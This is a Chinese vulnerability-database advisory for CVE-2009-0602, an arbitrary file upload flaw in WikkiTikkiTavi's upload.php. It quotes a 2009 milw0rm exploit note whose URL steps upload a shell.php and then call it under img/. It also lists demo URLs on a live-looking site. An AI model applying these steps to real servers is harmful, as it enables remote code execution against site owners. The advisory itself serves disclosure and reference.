WikkiTikkiTavi 'upload.php' 任意文件上传漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117362 漏洞类型 输入验证
发布时间 2009-02-06 更新时间 2009-02-17
CVE编号 CVE-2009-0602 CNNVD-ID CNNVD-200902-364
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7998
https://cxsecurity.com/issue/WLB-2009020195
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-364
|漏洞详情
WikkiTikkiTavi是一个脚本引擎,能运行在Wiki网站上的PHP脚本。WikkiTikkiTavi1.11版本的upload.php中存在无限制文件上传漏洞。远程攻击者可以借助上传一个具有可执行扩展名的文件并对img/的文件提交一个直接请求来访问该文件,以执行任意代码。
|漏洞EXP
#############################################
#----C4TEAM.ORG---ByALBAYX----C4TEAM.ORG----#
#############################################
[~]Author   : ByALBAYX

[~]Website  : WWW.C4TEAM.ORG
#############################################
[~]Script   :WikkiTikkiTavi 

[~]Site     :http://tavi.sourceforge.net
#############################################
[~]http://c4team.org/ [tavi_PATH] /upload.php


[~]http://c4team.org/ [tavi_PATH] img/[ shell.php ]



[~]Demo:



[~]http://skylined.org/change/tavi/upload.php


[~]http://skylined.org/change/tavi/img/albayx.php

#############################################
[~]Ýþinize Baqýn :=)

[~]Greetz For  

[~]Mrabah12R & Kralman & K3vin Mitnick & web-terrorist & SpotGang & Belarus & Tajik
#############################################
Derdimi dinledim, derdimden iGRENDiM...
Onun derdini gordum, derdime iMRENDiM...
FilistiN
----------

# milw0rm.com [2009-02-06]
|参考资料

来源:XF
名称:wikkitikkitavi-upload-file-upload(48571)
链接:http://xforce.iss.net/xforce/xfdb/48571
来源:BID
名称:33647
链接:http://www.securityfocus.com/bid/33647
来源:MILW0RM
名称:7998
链接:http://www.milw0rm.com/exploits/7998